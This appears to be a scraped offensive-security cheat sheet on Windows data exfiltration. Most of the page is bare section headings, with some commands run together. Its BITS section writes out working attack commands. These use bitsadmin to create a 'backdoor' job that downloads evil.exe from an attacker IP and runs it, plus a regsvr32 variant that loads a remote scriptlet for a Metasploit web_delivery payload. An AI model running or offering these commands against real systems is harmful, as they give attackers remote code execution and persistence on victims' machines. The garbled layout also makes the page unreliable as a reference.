Window Data Exfilt
Data Exfiltration
Exfiltrate Data Using BITS Jobs
Start-BitsTransfer -Source file.txt -Destination \\client\share -Priority normalStart-BitsTransfer https://server/dir/myfile.txt C:\docs\myfile.txtbitsadmin /create backdoor
bitsadmin /addfile backdoor "http://10.10.10.10/evil.exe" "C:\tmp\evil.exe"
# v1
bitsadmin /SetNotifyCmdLine backdoor C:\tmp\evil.exe NUL
bitsadmin /SetMinRetryDelay "backdoor" 60
bitsadmin /resume backdoor
# v2 - exploit/multi/script/web_delivery
bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.10:8080/FHXSd9.sct scrobj.dll"
bitsadmin /resume backdoorExfiltrate Data Using FTP
Exfiltrate Data Using SMB
AES Encrypt and HTTP POST with PowerShell
Covert to and from Base64 with PowerShell
Send an email with PowerShell
PowerShell Send-MailMessage cmdlet
Send-MailMessage cmdletMisc
Web services
File-transfer Programs
SCP
Airgap Exfiltration
References
Last updated